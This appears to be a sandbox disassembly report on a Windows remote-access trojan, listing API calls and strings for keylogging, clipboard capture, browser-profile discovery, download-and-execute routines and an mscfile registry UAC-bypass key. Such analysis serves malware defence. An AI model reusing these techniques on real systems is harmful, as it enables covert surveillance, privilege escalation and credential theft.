                                      • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                      • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                      • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                      • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                      Strings
                                      • http\shell\open\command, xrefs: 00412026
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: http\shell\open\command
                                      • API String ID: 3677997916-1487954565
                                      • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                      • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                      • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                      • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                                      • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                                      • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                                      Strings
                                      • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Software\Classes\mscfile\shell\open\command
                                      • API String ID: 1818849710-505396733
                                      • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                      • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                      • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                      • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                        • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                        • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                      • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                      • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                      • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                      • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: P0F
                                      • API String ID: 1818849710-3540264436
                                      • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                      • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                      • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                      • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                      • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                      • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                      • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                      • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                      • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                      • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                      • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                      APIs
                                        • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                        • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                        • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                      • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQuerySleepValue
                                      • String ID: H"G$exepath$!G
                                      • API String ID: 4119054056-2148977334
                                      • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                      • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                      • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                      • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                      APIs
                                        • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                        • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                        • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                      • Sleep.KERNEL32(000001F4), ref: 0040955A
                                      • Sleep.KERNEL32(00000064), ref: 004095F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                      • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                      • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                      • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                      • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                      • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                      • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: open
                                      • API String ID: 2825088817-2758837156
                                      • Opcode ID: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
                                      • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                      • Opcode Fuzzy Hash: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
                                      • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                      • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                      • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                      • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                        • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                      • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 00404092
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                      • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                      • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                      • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                      APIs
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                      • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                      • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                      • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                      • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                      • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                      • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                      • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                      • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                      • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                      • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                      • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                      • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                      • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                      • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                      • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 0040A597
                                        • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                        • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                        • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                        • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                        • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                        • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                        • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 3195419117-2658077756
                                      • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                      • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                      • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                      • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 0040A5F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                      • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                      • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                      • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: 6h@
                                      • API String ID: 2654517830-73392143
                                      • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                      • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                      • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                      • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                      • GetLastError.KERNEL32 ref: 0043B4E9
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                      • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                      • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                      • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00410955), ref: 004105F1
                                      • IsBadReadPtr.KERNEL32(?,00000014,00410955), ref: 004106BD
                                      • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                      • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                      • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                      • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                      • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19